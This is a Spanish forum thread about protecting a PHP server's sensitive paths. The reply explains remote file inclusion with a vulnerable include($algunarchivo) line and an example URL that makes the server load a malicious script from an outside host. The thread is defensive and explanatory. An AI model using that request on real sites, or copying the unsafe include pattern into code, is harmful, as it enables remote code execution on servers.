| |||
regular expresions saludos! lei algo de las expresiones regulares en php, y que su uso puede evitar que alguien desde el browser acceda a direcciones sensitivas en el disco duro del server. ahora, como hago para que cada vez que se escriba una direccion en el url del browser se ejecute una rutina que evalue dicha url que ha sido escrita por el usuario?? gracias. la meta es no ser imbéciles |
| |||
Re: regular expresions Creo q lo q tu has leido es algo como esto: si tienes un: llamar_fichero.php <? include($algunarchivo); ?> y lo llmas asi: llamar_fichero.php?algunarchivo=http://taltal.com/scriptmalicioso.php Por ahi te podrian ejecutar algun script o mas cosas .. Bien . si es asi .. se usan las expresiones regulares para ver detalles sobre el Host q hace referencia etc ... Pero .. Si no usas eso (q por cierto hay mas metodos mas seguros para hacer un include de ese tipo) .. El proteger o no un directorio de tu servidor .. no depende de PHP sino de los permisos de acceso q les des en tu Servidor HTTP .. bien sea con un .httpdaccess .. o directamente sobre el la configuracion de tu servidor HTTP .. (si usas apache . edita tu httpd.conf y veras un apartado <directory /> .. y ahi unos permisos </directory>) Podrias publicar el articulo/pagina q dices q vistes a ver si es eso o no ... Un saludo, |